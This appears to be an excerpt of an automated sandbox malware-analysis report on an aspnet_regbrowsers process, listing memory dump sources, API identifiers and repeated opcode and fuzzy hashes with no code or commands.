                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                                        • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                                        • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 12 9effb4-9effc9 LdrInitializeThunk
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                                        • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                                        • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512183969.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512183969.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512183969.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: h
                                                                                                                                                                                        • API String ID: 0-2439710439
                                                                                                                                                                                        • Opcode ID: 075165b18fd9f3b4bc5acd4a2c9709fb8842792709ea67660a0024d6c808ff27
                                                                                                                                                                                        • Instruction ID: f77eee6e2664df6625b163e4d2198187ea02919632482e59105157d8887227b1
                                                                                                                                                                                        • Opcode Fuzzy Hash: 075165b18fd9f3b4bc5acd4a2c9709fb8842792709ea67660a0024d6c808ff27
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6351E271A00209ABDB24DF65DC81AEFB7B9EF89304F00452EE90597341E738EA4587E9
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512183969.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512183969.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512183969.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: (
                                                                                                                                                                                        • API String ID: 0-3887548279
                                                                                                                                                                                        • Opcode ID: c0628fd986619627b6302748f753d5ad595e4d04418077e8cefceef9e2bba27f
                                                                                                                                                                                        • Instruction ID: d40165270fcfcedd80acac774fbd393f2c8b4f1a636fb76bba10551393bf88db
                                                                                                                                                                                        • Opcode Fuzzy Hash: c0628fd986619627b6302748f753d5ad595e4d04418077e8cefceef9e2bba27f
                                                                                                                                                                                        • Instruction Fuzzy Hash: C1216070604105ABCB18CF5ADC81CAB77A9EFC4724714C15AE8098BB05E738ED91CBE8
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512183969.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512183969.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512183969.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 7574933a44b0fdf8b64d52a8e9ec827446bccbfb52860849b7ddde52bd5142c4
                                                                                                                                                                                        • Instruction ID: de2ed033ce42278643d0ecb15df6f765b958d073a96daf7b0653906d73af5185
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7574933a44b0fdf8b64d52a8e9ec827446bccbfb52860849b7ddde52bd5142c4
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4811E7716442087BE220DA65DC82FEB73DCDF49708F00055AFA18CB281E7A5AE9583E9
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512183969.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512183969.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512183969.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 48c30c759282df32a69582c0e84fa8e331d4d3f44e6be63bf03dfd5e91422d82
                                                                                                                                                                                        • Instruction ID: f808679271f3bc9a46778b0b2851e9c1a04e74a417bd96fa7d1728d5d6a33df2
                                                                                                                                                                                        • Opcode Fuzzy Hash: 48c30c759282df32a69582c0e84fa8e331d4d3f44e6be63bf03dfd5e91422d82
                                                                                                                                                                                        • Instruction Fuzzy Hash: 72115B7164D2582FE310D6A96CC2FEB379CCF4B314F04009BF948CB182E2995D9543E6
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512183969.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512183969.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512183969.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: d3eec7f53628270d2ffbb2f647a4dc6d05db25c3065396913a808469baece765
                                                                                                                                                                                        • Instruction ID: 6398f88bd213288263d4a92cdd24e3909150e1f6afbf37b59f273c19312f9f72
                                                                                                                                                                                        • Opcode Fuzzy Hash: d3eec7f53628270d2ffbb2f647a4dc6d05db25c3065396913a808469baece765
                                                                                                                                                                                        • Instruction Fuzzy Hash: E9F0683674162437C2201959AD45FEBB619CBC1F65F090126FF0CDB343E765994286DD
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512183969.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512183969.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512183969.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 83689f81059a6b49a2024fe5df60d3a41d9544cfe624bc4d74d54462aac7b488
                                                                                                                                                                                        • Instruction ID: e90d50ebbf5f58e3ad0a79cb29ceb9f8597f2691e9ad76120241f9398c4b1d9a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 83689f81059a6b49a2024fe5df60d3a41d9544cfe624bc4d74d54462aac7b488
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2001627290030C66DB14EBE1CC82FEF773D9B44704F00459AB7496B0C2E679A698CBE5
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512183969.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512183969.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512183969.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 38c6c326ce4ad33f05e29f6f7788b92ff59919cab33535bedbac99f45c558931
                                                                                                                                                                                        • Instruction ID: 41f32d51419d74dc4a9da0f683c996f9e5c7be6796b01064dfd11c382aa31147
                                                                                                                                                                                        • Opcode Fuzzy Hash: 38c6c326ce4ad33f05e29f6f7788b92ff59919cab33535bedbac99f45c558931
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7CE0EDB660430E6F9B04CE69DC52CAB37ACEB48214B04451AFC09C3200F630F9208BA1
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512183969.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512183969.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512183969.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 464f7d1c597164a6d5357f671cdf5d26846a914594145784788906905fc075af
                                                                                                                                                                                        • Instruction ID: e8f2d5b6531cf6e7fdc51e43174f77600670f5a93a1743d7ba89319a7aa4225a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 464f7d1c597164a6d5357f671cdf5d26846a914594145784788906905fc075af
                                                                                                                                                                                        • Instruction Fuzzy Hash: 06E0863660131437C220558ADC06FD7B75CCBC5F64F09002AFE0C9B341E668AD8186E9
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512183969.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512183969.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512183969.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: c40b263e171f7afe17e06ae10761000326582230c5089b313f59c0bdbc66b179
                                                                                                                                                                                        • Instruction ID: c6fc234e1bb99ff65f56378bf5e044b51cb105a8b799a7e722716a2ca120b4b6
                                                                                                                                                                                        • Opcode Fuzzy Hash: c40b263e171f7afe17e06ae10761000326582230c5089b313f59c0bdbc66b179
                                                                                                                                                                                        • Instruction Fuzzy Hash: 97F0AC75610209AFDB04CF59C881EDB73A9EB88750F04C519FD19CB241E774EA11CBA1
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512183969.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512183969.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512183969.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: a41cd42a5fc2232a364da95367f21f738660a4e3fb78708dd8b08bff0254022e
                                                                                                                                                                                        • Instruction ID: 962367b92bd2a9ec76eb27684a3d5b6c114e4298b9661d9b67db10bb08b19143
                                                                                                                                                                                        • Opcode Fuzzy Hash: a41cd42a5fc2232a364da95367f21f738660a4e3fb78708dd8b08bff0254022e
                                                                                                                                                                                        • Instruction Fuzzy Hash: 26E02B7181030856F764F7708D4BFD9737C8B04308F0007D9B60C661C2FB7856554A96
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512183969.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512183969.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512183969.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 7ff3bc997b7e8420044eb2aae527a3d3b88b8387f7e416a5616c9eb0b9c8c3e0
                                                                                                                                                                                        • Instruction ID: 34338f23d7e64903e0b9a54f15b02f3c0b1d2e4bbca900a8ee38a589897490cd
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ff3bc997b7e8420044eb2aae527a3d3b88b8387f7e416a5616c9eb0b9c8c3e0
                                                                                                                                                                                        • Instruction Fuzzy Hash: A9C080755003087FD704EF8CDC46F5533DC9708614F044044B90C8B342D574FD508755
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512183969.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512183969.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512183969.000000000041B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 0ee51949425437bc9dc5565c1d393f680b9ee1214d6f8e49783f9c6d8b7bbb6b
                                                                                                                                                                                        • Instruction ID: 71cd0b4ea5b82251a8dfacf4b4f4a81eb47669f17a6830740459b1cdfa128c40
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ee51949425437bc9dc5565c1d393f680b9ee1214d6f8e49783f9c6d8b7bbb6b
                                                                                                                                                                                        • Instruction Fuzzy Hash: C7A022A0C0830C03002030FA2B03023B30CC000028F0003EAAE8C022023C02A83200EB
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: [Pj
                                                                                                                                                                                        • API String ID: 0-2289356113
                                                                                                                                                                                        • Opcode ID: 9e853aae46fb543f6d8c3adde23061152f051c48958a1c6034ed940adc303b0d
                                                                                                                                                                                        • Instruction ID: 1c189b2716e2cb728f8f9f11a016dda2dfb48f630d21804a4624bf34e5643972
                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e853aae46fb543f6d8c3adde23061152f051c48958a1c6034ed940adc303b0d
                                                                                                                                                                                        • Instruction Fuzzy Hash: BFF0CD31208284ABEB229B21CD85F2A7BA9AFD1715F10C818F9452A093C7A2CC61E721
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                                                                                                        • Instruction ID: 747c9bfb4e41d6bab99da52f9504779039b9dc28327d455aa4b084029d3847d8
                                                                                                                                                                                        • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9BF0C23172465D9BDB48EB1CAD59B7A33E5EB94300F58C039EE49CB281E631DD408391
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                                                                                                                                        • Instruction ID: 17cd7ebf30edc40a2c3f2381a4465a820506a8baff5b4811e3cf82638aa7feb0
                                                                                                                                                                                        • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4BF082762402049FCB1CCF19C490FB937B2ABC0715F24412CE60B8F690D735A841EA54
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: a2c42fe24e0d7b2b5f468ff00d17fce5f8218eba7b26f97e111709aca9dcd661
                                                                                                                                                                                        • Instruction ID: af516b62756be56ab1480a64a979fa2ba154cda05aa923bc014957438eff2b9a
                                                                                                                                                                                        • Opcode Fuzzy Hash: a2c42fe24e0d7b2b5f468ff00d17fce5f8218eba7b26f97e111709aca9dcd661
                                                                                                                                                                                        • Instruction Fuzzy Hash: DCE01A72549B81DBD322DF55D901B1AB3E4FF88B10F15483AF40A97750D7B89E05C962
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                                                                                                                        • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
